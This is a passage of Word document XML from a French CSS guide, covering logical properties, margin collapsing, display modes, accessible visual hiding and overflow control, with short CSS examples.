            <w:tcW w:type="dxa" w:w="275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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>padding-inline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>gauche et droite logiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>selon le sens d'écriture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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margin-block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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haut et bas logiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="275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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>espace entre éléments flex ou grid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>recommandé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une boîte écrite en propriétés logiques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.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-block: 1.5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-inline: 1.25rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-block-end: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-inline-start: 4px solid #e0a21b;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Préférez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aux marges entre éléments d'une grille ou d'un flex : il n'ajoute d'espace qu'entre les enfants, jamais sur les bords, ce qui évite les corrections au cas par cas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.4 Fusion des marges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deux marges verticales adjacentes fusionnent en une seule, dont la taille est la plus grande des deux. Ce comportement, hérité de la typographie, surprend lorsqu'on attend une somme.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3111500"/>
            <wp:docPr id="22" name="Picture 22"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f20.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3111500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.20 — La fusion des marges en action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois façons de maîtriser la fusion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Fusion : l'espace fait 24 px */</w:t>
        <w:br/>
        <w:t>p { margin-block: 16px 24px; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Pas de fusion à l'intérieur d'un conteneur bordé */</w:t>
        <w:br/>
        <w:t>.conteneur { padding: 1px; }   /* artifice courant */</w:t>
        <w:br/>
        <w:t>.conteneur { border: 1px solid transparent; }  /* plus propre */</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Solution moderne : flow-root crée un contexte de formatage */</w:t>
        <w:br/>
        <w:t>.conteneur { display: flow-root; }</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LA FUSION NE S'APPLIQUE PAS PARTOUT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Les marges ne fusionnent ni entre éléments flex ou grid, ni à travers un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>padding</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou une bordure, ni lorsque </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>overflow</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> crée un contexte de formatage. C'est pourquoi un même code se comporte différemment selon le conteneur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La marge d'un enfant peut aussi « s'échapper » de son parent et décaler tout le bloc. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>display: flow-root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le parent supprime ce phénomène sans artifice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.5 Modes d'affichage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La propriété </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> détermine la façon dont une boîte se comporte : bloc, ligne, flex, grid, ou aucun rendu. Choisir le bon mode évite les contournements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.46 — Sept modes d'affichage et leur usage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05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Valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="395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Comportement</w:t>
            </w:r>
          </w:p>
        </w:tc>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3954"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pleine largeur, sauts de ligne</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Sections, paragraphes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="205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inline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="395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Suit le flux du texte, marges verticales ignorées</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Liens, emphase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>inline-block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3954"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>En ligne, mais avec dimensions</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Puces, badges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="205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flex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="395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Aligne les enfants sur un axe</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Barres, cartes, centrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>grid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3954"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aligne les enfants sur deux axes</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Mises en page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="205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none</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="395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Retire du rendu et de l'arbre d'accessibilité</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Masquage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3954"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Supprime la boîte, conserve les enfants</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Cas particuliers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le cas typique du badge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.badge {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: inline-block;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: .15rem .5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 999px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #e8edf1;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>/* Un inline pur ignorerait ce padding vertical : d'où inline-block */</w:t>
        <w:br/>
        <w:br/>
        <w:t>[hidden] { display: none; }</w:t>
        <w:br/>
        <w:t>/* ne pas confondre avec visibility: hidden, qui réserve l'espace */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>display: none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> retire l'élément de la page et de l'arbre d'accessibilité : un lecteur d'écran ne l'annonce plus. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>visibility: hidden</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> le rend invisible mais conserve l'espace — et le retire aussi de l'arbre. Pour masquer visuellement sans priver les lecteurs d'écran, on utilise une classe de masquage spécifique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Masquer visuellement, sans masquer aux technologies d'assistance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.visually-hidden {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: absolute;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: 1px; height: 1px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin: -1px; padding: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  overflow: hidden;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  clip-path: inset(50%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  white-space: nowrap;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 0;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.6 Débordements et dimensions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lorsqu'un contenu est plus large que sa boîte, il déborde. Quatre propriétés contrôlent ce comportement : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>overflow-x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>overflow-y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>clip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Contenir un débordement sans le subir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.extrait {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  max-height: 12rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  overflow: auto;              /* barres si nécessaire */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  overscroll-behavior: contain; /* évite le défilement en chaîne */</w:t>
        <w:br/>
